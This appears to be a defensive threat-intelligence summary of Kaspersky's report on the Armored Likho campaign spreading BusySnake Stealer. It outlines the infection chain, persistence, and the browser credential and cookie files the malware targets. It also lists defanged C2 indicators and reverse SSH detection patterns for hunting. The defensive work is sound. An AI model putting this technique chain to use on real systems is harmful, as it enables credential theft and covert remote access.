Armored Likho BusySnake campaign
Summary
Kaspersky reported an active Armored Likho campaign on July 3, 2026 that uses spear-phishing archives, AI-looking loaders, GitHub-hosted staging, Python runtime deployment, and the newly documented BusySnake Stealer against government and electric-power-sector targets in Russia, Kazakhstan, and Brazil.
Tags
- ops
- operations
- APT
- spear phishing
- Windows malware
- infostealer
- Python malware
- PyArmor
- LNK
- PowerShell
- GitHub abuse
- scheduled task persistence
- browser credential theft
- cookie theft
- reverse SSH tunneling
- government targeting
- electric power sector
- Armored Likho
- Eagle Werewolf
- BusySnake Stealer
Campaign flow
- Spear phishing: targets receive archives with themes such as psychological tests, humanitarian aid applications, government notices, social programs, or debt-clearance certificates.
- First stage: archives contain either an NSIS executable or an LNK file. The LNK variant uses command-line hiding associated with ZDI-CAN-25373 and launches a
rundll32.exe/ PowerShell download chain. - Decoy: victims see a survey application or decoy DOCX while staging continues.
- Payload retrieval: loaders fetch Python 3.12,
get-pip.py, PyArmor runtime material,data.zip, andmodule.pyw, with Kaspersky noting GitHub repository / release abuse for staging and rotation. - Persistence: the malware builds
%APPDATA%\\WindowsHelper, creates VBScript helpers, and registers a scheduled task to run BusySnake repeatedly. - Collection and C2: BusySnake steals browser credentials and cookies, collects screenshots / clipboard / documents / key-like strings, polls for tasks, and can establish reverse SSH tunnels.
What is durable
- Armored Likho is moving from standalone tunneling tools toward embedding reverse SSH control directly in the stealer.
- Kaspersky says first-stage payload source included verbose comments and emoji-style formatting that strongly suggests LLM-generated code, complicating attribution and loader-signature stability.
- BusySnake's handler architecture and C2 status model overlap with Armored Likho's AquilaRAT tooling, supporting Kaspersky's medium-confidence attribution.
- The newer BusySnake version moved scheduled-task creation into the
Schedule.ServiceCOM object viawin32com.client, a quieter persistence implementation than directschtaskscommand lines.
Victimology
Kaspersky reports confirmed victims in:
- Russia
- Kazakhstan
- Brazil
Primary sectors called out publicly:
- government agencies
- electric power infrastructure
Defender response
- Treat a confirmed BusySnake infection as credential compromise. Rotate browser-stored credentials, session cookies, source-control tokens, cloud credentials, VPN credentials, and any secrets stored in user documents or files with long hexadecimal keys.
- Scope for
%APPDATA%\\WindowsHelper,module.pyw,run.vbs,wh_selfdelete.vbs, Python 3.12 sideload bundles, PyArmor runtime artifacts, and scheduled tasks named like Windows helper / update components. - Hunt for LNK-to-
rundll32.exe-to-PowerShell chains, NSIS droppers launchingpnx.exe, and user-writable Python processes that read ChromiumLogin State/Login Data, Firefoxlogins.json/key4.db, or browser cookie stores. - Block or investigate outbound traffic to the public C2 names and IPs published by Kaspersky, including
grked[.]online,winupdate[.]live,arvax[.]xyz,159.198.32[.]222, and related infrastructure. - Detect reverse SSH usage with
-R 0.0.0.0:<port>, disabled host-key checking, and keys supplied at runtime from untrusted infrastructure.
Sources
- Kaspersky Securelist: https://securelist.com/tr/armored-likho-apt-with-busysnake-stealer/120292/